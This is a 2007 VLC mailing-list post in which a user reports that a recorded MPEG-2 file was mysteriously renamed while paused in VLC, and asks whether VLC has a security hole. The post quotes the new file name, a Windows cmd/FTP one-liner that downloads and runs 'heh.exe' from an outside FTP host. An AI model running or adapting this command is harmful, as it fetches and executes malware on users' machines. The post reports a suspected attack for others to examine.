[vlc] Very strange/suspicious VLC-related behavior
Ross Finlayson
finlayson at live555.com
Tue Apr 10 09:38:37 CEST 2007
Today I encountered something very strange, that suggests that
perhaps VLC is somehow being used in an attempt to spread a virus.
I was running VLC version 0.8.6a on Mac OS X 10.4.9. I was playing a
MPEG-2 Transport Stream file that I had previously recorded myself
(i.e., it had not been downloaded from the Internet). Partway
through the playback, I paused VLC, and left my computer. (Noone
else has physical access to the computer.)
A few hours later, I returned, and found that my MPEG-2 Transport
Stream file (the one that VLC was playing) had been renamed to the
following long strange file name:
cmd /c echo open ftp.heh.pheer.info .. heh 7echo binary ..
heh 7echo get heh.exe .. heh 7echo bye .. heh 7ftp -as;heh 7del heh
7start heh.exe 7exit
This file name appears to be an attempted script that downloads and
runs an executable "heh.exe" from a remote site. Obviously - in my
case at least - this isn't going to work, because (i) it's a file
name, not file contents, and (ii) I'm running Mac OS X, not Windows.
Another thing I noticed: When I then quit VLC, it prompted me,
saying that its settings had changed, and asking if I wanted to keep
the new settings. (Of course, I said "no".)
Has anyone else seen anything like this? Is this an indication of a
security hole in VLC? (Is there anything in the VLC code that can
allow files to be renamed?)
Ross.
--
This is the vlc mailing-list, see http://www.videolan.org/vlc/
To unsubscribe, please read http://www.videolan.org/support/lists.html
More information about the vlc
mailing list